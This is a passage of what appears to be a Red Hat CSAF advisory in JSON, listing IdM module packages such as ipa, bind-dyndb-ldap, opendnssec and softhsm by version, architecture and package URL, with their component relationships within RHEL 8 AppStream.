"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
"product_reference": "idm:DL1:8100020240416171943:823393f5",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
